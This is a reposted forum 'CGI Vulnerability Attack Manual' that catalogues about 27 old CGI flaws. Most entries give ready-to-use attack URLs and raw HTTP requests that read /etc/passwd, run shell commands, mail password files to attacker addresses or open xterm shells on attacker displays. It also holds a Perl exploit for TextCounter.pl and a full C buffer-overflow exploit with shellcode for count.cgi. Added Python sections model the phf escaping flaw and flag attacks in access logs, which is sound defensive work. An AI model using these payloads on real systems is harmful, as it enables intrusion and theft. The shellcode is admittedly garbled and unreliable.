CGI Vulnerability Attack Manual

xiaoxiao2021-03-06  43

I saw the article written by Bamboo in the forum and wanted to expand on it. I had been meaning to improve some parts and post it, but I have not had time to try all of the vulnerabilities. I think there are many comrades in the forum who will perfect it. I have named it the CGI Vulnerability Attack Manual Version-0.02 (upgraded from Bamboo's); it is meant to throw out a brick to attract jade. Revisions and additions are welcome ... and spreading it around is even more welcome. :)

1. PHF vulnerability

This PHF vulnerability is probably the most classic one; almost every article introduces it. phf hands the Qalias field to a shell (through popen) after an escaping routine that backslashes the usual shell metacharacters but forgets the newline, so a URL-encoded newline (%0a) ends the ph command and starts one of your own, running with the web server's privileges. For example, to display /etc/passwd:

lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

But can it still be found anywhere?
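As an added example that is not part of the original manual, here is a small Python model of why the encoded newline works against phf. The set of characters NCSA httpd's escape_shell_cmd() escaped is reproduced from memory of util.c, so treat the exact set as an assumption; the shape of the ph command line and the miniature /bin/sh splitter are also simplifications of my own, kept just large enough to show which characters survive the filter.

```python
import re

# Characters that NCSA httpd's escape_shell_cmd() backslash-escaped before the
# string was handed to popen().  Reproduced from memory of util.c, so treat the
# exact set as an assumption; the point is that "\n" is not in it.
NCSA_ESCAPED = set('&;`\'"|*?~<>^()[]{}$\\')
# What the fix added: newline (and carriage return), which the shell also
# treats as a command terminator.
FIXED_ESCAPED = NCSA_ESCAPED | {"\n", "\r"}


def escape_shell_cmd(s, escaped=NCSA_ESCAPED):
    """Backslash-escape every character in `escaped`, like the C routine did."""
    return "".join("\\" + ch if ch in escaped else ch for ch in s)


def phf_command(qalias, escaped=NCSA_ESCAPED):
    """Build the command phf ran.  The command shape is an assumption made for
    this example; only the escaping step matters here."""
    return "/usr/local/bin/ph -m alias=" + escape_shell_cmd(qalias, escaped)


def sh_commands(cmdline):
    """Tiny model of how /bin/sh splits one command line into commands: an
    unescaped newline or ';' ends a command, a backslash quotes the next
    character, and backslash-newline is a line continuation (both dropped)."""
    cmds, cur, i = [], [], 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and i + 1 < len(cmdline):
            if cmdline[i + 1] != "\n":
                cur.append(cmdline[i + 1])
            i += 2
            continue
        if ch in "\n;":
            if "".join(cur).strip():
                cmds.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    if "".join(cur).strip():
        cmds.append("".join(cur).strip())
    return cmds


ALIAS_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def alias_is_safe(qalias):
    """Allowlist check.  Escaping is a blocklist and missed one character;
    refusing anything that is not a plausible ph alias cannot miss one."""
    return ALIAS_RE.fullmatch(qalias) is not None


if __name__ == "__main__":
    # The classic payload as the server sees it after URL decoding
    # (%0a -> "\n", %20 -> " ").
    payload = "x\n/bin/cat /etc/passwd"
    print("NCSA  :", sh_commands(phf_command(payload)))
    print("fixed :", sh_commands(phf_command(payload, FIXED_ESCAPED)))
    print("';' is caught even by the old code:", sh_commands(phf_command("x;id")))
    print("allowlist:", alias_is_safe("jdoe"), alias_is_safe(payload))
```

With the original character set the shell sees two commands, the second of them yours; with the newline escaped the backslash-newline becomes a line continuation and everything stays one argument of ph. The allowlist is the fix a practitioner should prefer over extending the blocklist.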

2. PHP.CGI 2.0beta10 and earlier

You can read any file that the nobody user has permission to read:

lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

PHP.CGI version 2.1 can only read SHTML files.

As for password files, comrades should pay attention: on systems with shadowed passwords the hashes may be elsewhere, e.g. in /etc/master.passwd or /etc/security/passwd.

3. whois_raw.cgi

The fqdn parameter is passed to a shell without filtering, so again a URL-encoded newline (%0A) lets you run commands:

lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

4. faxsurvey

faxsurvey executes whatever is in its query string through a shell:

lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

5. TextCounter.pl

If TextCounter.pl is on the server, anyone can execute commands with the permissions of the HTTP daemon: the script does not sanitize the document path the server hands it before using it in a shell command, so a ';' in that path ends the intended command. The exploit below embeds the command in the URL of a page that includes the counter, replacing spaces with ${IFS} so the shell still splits the words:

#!/usr/bin/perl
# TextCounter.pl exploit, as on the page, cleaned up so that it runs
$url   = 'http://dtp.kappa.ro/a/test.shtml';   # please _do_ _modify_ this
$email = 'pdoru@pop3.kappa.ro,root';           # please _do_ _modify_ this

if ($ARGV[0]) {
    $cmd = $ARGV[0];                            # command given on the command line
} else {
    # default: mail the process list, /etc/passwd and the environment to $email
    $cmd = "(ps ax;cd ..;cd ..;cd ..;cd etc;cat passwd;set) | mail ${email} -sANOTHER_ONE";
}

# the command rides inside the path that textcounter.pl later passes to a shell
$text = "${url}/;=/$cmd;echo|";
$text =~ s/ /\${IFS}/g;                         # spaces would break the URL
#print "$text\n";

system({"wget"} "wget", $text, "-o/dev/null");
#system({"lynx"} "lynx", $text);                # if there is no wget, lynx works too

6. info2www (some versions, 1.1)

Run locally with a GET request in the argument:

$ REQUEST_METHOD=GET ./info2www '(../../../../../..../bin/mail jami
$
You have new mail.
$

I don't quite understand this one. :(

7. pfdispaly.cgi

This SGI IRIX Performer API search tool script reads back the file named in its query string, so a traversal path works:

lynx -source 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../etc/motd'

pfdispaly.cgi also has another hole that executes a command, again through an encoded newline:

lynx -dump 'http://www.victim.com/cgi-bin/pfdispaly.cgi?%0a/bin/uname%20-a|'

or

lynx -dump 'http://victim/cgi-bin/pfdispaly.cgi?%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

8. wrap

Another IRIX CGI: it lists the directory given in its query string and is not restricted to the document tree:

lynx http://www.victim.com/cgi-bin/wrap?/../../../../etc

9. WWW-SQL

It lets you read some protected pages. For example, entering

http://your.server/protected/something.html

requires an account and password, but going through WWW-SQL does not:

http://your.server/cgi-bin/www-sql/protected/something.html

The script opens the file named by its PATH_INFO itself, so the web server's access control on /protected/ never gets a say.

10. view-source

lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd

11. campas

Spaces are replaced by encoded newlines here, since campas splits its input on them:

lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais

The query parameter is passed to a shell, so a ';' ends the intended command:

telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-Length: 85        (replace this with the actual length of the "exploit" line)

query='; mail drazvan\@pop3.kappa.ro

13. websendmail

telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-Length: XXX       (should be replaced with the actual length of the string passed to the server; in this case xxx = 90)

receiver=;mail your_address\@somewhere.org

14. handler

Another IRIX CGI. The path after the script name goes to a shell:

telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat<TAB>/etc/passwd|?data=Download HTTP/1.0

or

GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download

or

GET /cgi-bin/handler/ ;xterm -display Danish:0 -e /bin/sh|?data=Download

Note that <TAB> after cat stands for a Tab character, used instead of a space: the server will fail to open useless_shit but still executes the command that follows it.

15. test-cgi

lynx http://www.victim.com/cgi-bin/test-cgi?/whatever

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = /whatever
REMOTE_HOST = fiffh.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

That already leaks the server software and layout. To get a listing of some HTTP directory:

lynx http://www.victim.com/cgi-bin/test-cgi?/help%0a/bin/cat /etc/passwd

This trick didn't work for me. :(

lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*

You can also try it this way. The script echoes $QUERY_STRING unquoted, so the shell expands a * as a glob and the "report" contains a file listing:

GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

16. Apache on some BSDs:

lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

With UserDir enabled, ~root maps to root's home directory; on the BSDs where that directory is /, the second URL walks straight into /etc.

17. htmlscript

lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

18. jj.c

The demo CGI program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply a "|" followed by a Unix command. It may require a password, but two known passwords are httpdrocks and sdgrocks. If you can retrieve a copy of the compiled program, running strings on it will probably reveal the password.

Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

19. FrontPage extensions

If you read http://www.victim.com/_vti_inf.html you will get the version of the FrontPage Extensions on the server. There are also some password files (user:hash, in the same crypt() format as htpasswd) that are often left readable:

http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd

20. freestats.com CGI

I have never run into this one, and there are places I did not understand, so I attach the original text directly.

John Carlton found the following. He developed an exploit for the free web stats services offered at FreeStats.com, and supplied the webmaster with the proper code to patch the bug.

Start an account with FreeStats.com and log in. Click on the area that says "Click here to edit your user profile & counter info". This will call up a file called edit.pl with your user and password included in it. Save this file to your hard disk and open it with Notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from

<input type=hidden name=account value=your#>

to

<input type=text name=account value="">

Save your page and load it into your browser. There will now be a text input box where the hidden element was before. Simply type a # in and push "Click here to update user profile", and all the information that appears on your screen has now been written to that user profile.

But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you can change the password on all of their accounts with a simple JavaScript function.

Deep inside the web site the authors still have the good old "edit.pl" script. It (unlike the path described) can be reached directly at: http://www.siteTracker.com/cgi-bin/edit.pl?account=&password=

21. Vulnerability in GlimpseHTTP

telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\
HTTP/1.0

The part of the path after the script name is handed to a shell. Setting IFS to "5" makes every 5 in CMD a word separator, so the command needs no spaces in the URL.

22. count.cgi

This program is only valid for count.cgi (wwwcount) up to version 2.4; its own message says versions above that are patched. It is a stack overflow triggered through the query string and the User-Agent header, and the shellcode spawns an xterm back to the X display given with -d. The listing is the page's count.c cleaned up so that it compiles; the shellcode byte strings are reproduced as printed on the page, and a few bytes appear to have been lost in transcription, so treat them as a reference for the payload layout rather than as working shellcode.

/* ### count.c ### exploit for count.cgi (wwwcount), by gus */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *, long, char *);
int openhost(char *, int);

/* constants */
/* NOP sled, then code that builds an argv for
 * "/usr/X11R6/bin/xterm -ut -display <display>" and execve()s it.  The '0'
 * characters in the string are placeholders the code overwrites with NUL
 * bytes, since the query string itself cannot carry NULs.  The display name
 * is appended at run time by main(), followed by endpad. */
char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    /* jmp/call/pop to find the string, patch in the NULs, execve */
    "\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
    "\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
    "\x04\x8d\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
    "\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    "/usr/X11R6/bin/xterm0-ut0-display0";

char endpad[] =
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

int main(int argc, char *argv[])
{
    char *shellcode = NULL;
    int cnt, ver, retcount, dispnum, dotquads[4], offset;
    unsigned long sp;
    char dispname[255];
    char *host = NULL;

    offset = sp = cnt = ver = 0;
    fprintf(stderr, "\t%s - gus\n", argv[0]);
    if (argc < 3) usage(argv[0]);

    while ((cnt = getopt(argc, argv, "h:d:v:o:")) != EOF) {
        switch (cnt) {
        case 'h':
            host = optarg;
            break;
        case 'd':
            /* -d a.b.c.d:n is the X display to send the xterm to.  Each octet
             * is zero-padded to three digits so the display string always
             * has the length the shellcode's NUL offsets expect. */
            retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
                              &dotquads[0], &dotquads[1],
                              &dotquads[2], &dotquads[3], &dispnum);
            if (retcount != 5) usage(argv[0]);
            sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
                    dotquads[0], dotquads[1], dotquads[2], dotquads[3], dispnum);
            shellcode = malloc(strlen(dispname) + strlen(shell) + strlen(endpad) + 1);
            sprintf(shellcode, "%s%s%s", shell, dispname, endpad);
            break;
        case 'v':
            ver = atoi(optarg);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
    if (host == NULL || shellcode == NULL) usage(argv[0]);

    sp = offset + getsp(ver);
    doit(host, sp, shellcode);
    exit(0);
}

unsigned long getsp(int ver)
{
    /* Get the stack pointer we should be using.  YMMV.  If it does not work,
     * try using -o X, where X is between -1500 and 1500 */
    unsigned long sp = 0;

    if (ver == 15) sp = 0xBFFFEA50;
    if (ver == 20) sp = 0xBFFFEA50;
    if (ver == 22) sp = 0xBFFFEAB4;
    if (ver == 23) sp = 0xBFFFEE38;   /* dunno about this one */
    if (sp == 0) {
        fprintf(stderr, "I don't have a stack pointer for that version; try using the -o option.\n");
        fprintf(stderr, "Versions above 2.4 are patched for this bug.\n");
        exit(1);
    }
    return sp;
}

int usage(char *name)
{
    fprintf(stderr, "\tusage: %s -h <host> -d <a.b.c.d:display> -v <version> [-o <offset>]\n", name);
    fprintf(stderr, "\te.g.   %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n", name);
    exit(1);
}

int openhost(char *host, int port)
{
    int sock;
    struct hostent *he;
    struct sockaddr_in sa;

    he = gethostbyname(host);
    if (he == NULL) {
        perror("bad hostname");
        exit(-1);
    }
    memset(&sa, 0, sizeof sa);
    memcpy(&sa.sin_addr, he->h_addr_list[0], he->h_length);
    sa.sin_port = htons(port);
    sa.sin_family = AF_INET;
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("cannot open socket");
        exit(-1);
    }
    if (connect(sock, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("cannot connect to host");
        exit(-1);
    }
    return sock;
}

void doit(char *host, long sp, char *shellcode)
{
    int cnt, sock;
    char qs[7000];
    char chain[] = "user=a";

    /* Layout of qs: "user=a" followed by 0x90, the return address repeated
     * up to offset 4104, seven more copies of it, then the shellcode.  The
     * same buffer is sent twice, as the query string and as User-Agent. */
    for (cnt = 0; cnt < 4104; cnt += 4) {
        qs[cnt + 0] = sp & 0x000000FF;
        qs[cnt + 1] = (sp & 0x0000FF00) >> 8;
        qs[cnt + 2] = (sp & 0x00FF0000) >> 16;
        qs[cnt + 3] = (sp & 0xFF000000) >> 24;
    }
    strcpy(qs, chain);
    qs[strlen(chain)] = 0x90;            /* remove the NUL strcpy left behind */
    for (cnt = 4104; cnt < 4132; cnt += 4) {
        qs[cnt + 0] = sp & 0x000000FF;
        qs[cnt + 1] = (sp & 0x0000FF00) >> 8;
        qs[cnt + 2] = (sp & 0x00FF0000) >> 16;
        qs[cnt + 3] = (sp & 0xFF000000) >> 24;
    }
    strcpy((char *)&qs[4132], shellcode);

    sock = openhost(host, 80);
    write(sock, "GET /cgi-bin/count.cgi?", 23);
    write(sock, qs, strlen(qs));
    write(sock, " HTTP/1.0\n", 10);
    write(sock, "User-Agent: ", 12);
    write(sock, qs, strlen(qs));
    write(sock, "\n\n", 2);
    sleep(1);
    close(sock);

    /* to test locally against a copy of the CGI instead of over the network:
    setenv("HTTP_USER_AGENT", qs, 1);
    setenv("QUERY_STRING", qs, 1);
    system("./count.cgi");
    */
}

count.cgi can also be used to read image files outside the document tree, since display=image opens whatever path it is given:

http://attacked.host.com/cgi-bin/count.cgi?display=image&image=../../../../../path_to_gif/file.gif

23. finger.cgi

lynx http://www.victim.com/cgi-bin/finger?@localhost

Gets the usernames of whoever is logged in on the host.

24. man.sh

Robert Moniot found the following. The May 1998 issue of Sysadmin Magazine contains an article, "Web-enabled Man Pages", which includes source code for a very nice CGI script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature.

Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the CGI through their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page.

25. formhandler.cgi

Put this into the form's attachment field (the path is only checked for its /tmp/ prefix, which the ../ walks back out of):

value="text:/tmp/../etc/passwd">

and /etc/passwd arrives in your mailbox.

26. jfs

I believe everyone has seen the article "JFS's intrusion into the PCWEEK Linux host in detail"; he used the PhotoAds CGI package in an actual attack. I have not attacked it myself; my understanding from the article is as follows.

First:

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?adnum=31337&action=done&country=la&city=lele&state=a&email=lala@hjera.com&name=%0a11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&phone=11&subject=la&password=0&citystphone=0&rented=0"

creates a new ad, and once the check has passed the value becomes $adnum. Then:

lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&adnum=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111)&data=1&password=0&file_content=%00%00%00%00%00%00%00%00%00%00&file_name=/lala//../../../../..../../home/httpd/html/photoads/cgi-bin/advisory.cgi.gif'

creates or overwrites any file that the nobody user has permission to write.

I don't know whether my understanding is correct; I can't find the to_URL script in its zip package. Does any comrade know?

27. Backdoors

I have seen that some versions of cgichk.c check for Tuma's unlg 1.1 and for rwwwshell.pl. I have not seen the source code of the former, unlg; the latter was written by THC, and the source of version 1.6 is on PacketStorm.
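Turning the catalogue above around, here is an added example of the detection side; it is not part of the original manual. The Python script below runs the signatures this manual describes (known script names, encoded newlines as with phf and campas, the Tab trick of handler, the IFS trick of aglimpse and TextCounter, ../ traversal, the FrontPage .pwd files, the test-cgi glob, the oversized count.cgi query) over web-server access-log lines in common log format. The log lines are constructed for the example, and the tag names and the 4000-byte threshold for the overflow payload are my choices, not anything taken from the page.

```python
import re
from urllib.parse import unquote, urlsplit

# Script names from the catalogue above.  A hit on the name alone only means
# the script is present and its version should be checked; the other tags
# mark the request as an actual attack attempt.
KNOWN_CGI = {
    "phf", "php.cgi", "whois_raw.cgi", "faxsurvey", "textcounter.pl",
    "info2www", "pfdispaly.cgi", "wrap", "www-sql", "view-source", "campas",
    "webgais", "websendmail", "handler", "test-cgi", "nph-test-cgi",
    "htmlscript", "jj", "aglimpse", "count.cgi", "finger", "man.sh",
    "formhandler.cgi",
}

# NCSA/Apache common log format: ip ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def classify(uri):
    """Return the detection tags for one request URI as it appears in the log."""
    tags = []
    parts = urlsplit(uri)
    path = unquote(parts.path)
    decoded = unquote(uri)  # one decoding pass, as the CGI layer would do
    m = re.search(r"/cgi-bin/([^/?]+)", path, re.IGNORECASE)
    script = m.group(1).lower() if m else None
    if script in KNOWN_CGI:
        tags.append("vulnerable-cgi:" + script)
    if re.search(r"[\r\n]", decoded):
        tags.append("newline-injection")       # phf, campas, whois_raw, pfdispaly
    if "\t" in decoded:
        tags.append("tab-as-separator")        # IRIX handler
    if re.search(r"\.\.[/\\]", decoded):
        tags.append("path-traversal")          # view-source, wrap, htmlscript, count.cgi
    if re.search(r"\$\{?IFS\}?|(^|[|;&?=])IFS=", decoded):
        tags.append("ifs-trick")               # aglimpse, TextCounter
    if re.search(r"[|;`]", decoded):
        tags.append("shell-metachar")
    if re.search(r"/_vti_pvt/[^/]*\.pwd$", path, re.IGNORECASE):
        tags.append("frontpage-pwd-file")
    if script in ("test-cgi", "nph-test-cgi") and "*" in decoded:
        tags.append("glob-listing")
    if re.search(r"/etc/(passwd|shadow|master\.passwd|security/passwd|motd)", decoded):
        tags.append("sensitive-file")
    if len(parts.query) > 4000:                # threshold chosen for this example
        tags.append("oversized-query")         # count.cgi overflow payload
    return tags


def analyze(log_text):
    """Parse common-log lines and return the flagged ones as dicts."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        if not m:
            findings.append({"ip": None, "uri": line, "status": None, "tags": ["unparsed"]})
            continue
        tags = classify(m.group("uri"))
        if tags:
            findings.append({"ip": m.group("ip"), "uri": m.group("uri"),
                             "status": m.group("status"), "tags": tags})
    return findings


# Constructed sample log lines for this example; not from any real server.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Mar/1999:10:01:02 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1422',
    '10.0.0.5 - - [12/Mar/1999:10:01:09 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 901',
    '10.0.0.7 - - [12/Mar/1999:10:02:00 +0000] "GET /index.html HTTP/1.0" 200 2048',
    '10.0.0.5 - - [12/Mar/1999:10:02:31 +0000] "GET /cgi-bin/handler/x;cat%09/etc/passwd|?data=Download HTTP/1.0" 404 212',
    '10.0.0.9 - - [12/Mar/1999:10:03:10 +0000] "GET /_vti_pvt/service.pwd HTTP/1.0" 200 88',
    '10.0.0.9 - - [12/Mar/1999:10:03:11 +0000] "GET /cgi-bin/nph-test-cgi?* HTTP/1.0" 200 560',
    '10.0.0.5 - - [12/Mar/1999:10:04:00 +0000] "GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5x@y HTTP/1.0" 200 10',
    '10.0.0.7 - - [12/Mar/1999:10:05:00 +0000] "GET /cgi-bin/count.cgi?display=image&image=../../../../etc/motd HTTP/1.0" 200 300',
    '10.0.0.8 - - [12/Mar/1999:10:06:00 +0000] "GET /cgi-bin/count.cgi?user=a HTTP/1.0" 200 300',
    '10.0.0.5 - - [12/Mar/1999:10:07:00 +0000] "GET /cgi-bin/count.cgi?user=a' + "A" * 4200 + ' HTTP/1.0" 500 0',
])

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["tags"]), f["uri"][:60])
```

Decoding the URI once before matching is deliberate: the server decodes once before the CGI sees it, so a rule that only matches the literal "%0a" misses "%0A" and a rule that decodes twice starts firing on legitimate double-encoded data. The name-only hits (count.cgi?user=a) are kept as findings because the manual's advice for those scripts is to go and check the version.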

Please credit the original address when reposting: https://www.9cbs.com/read-45236.html
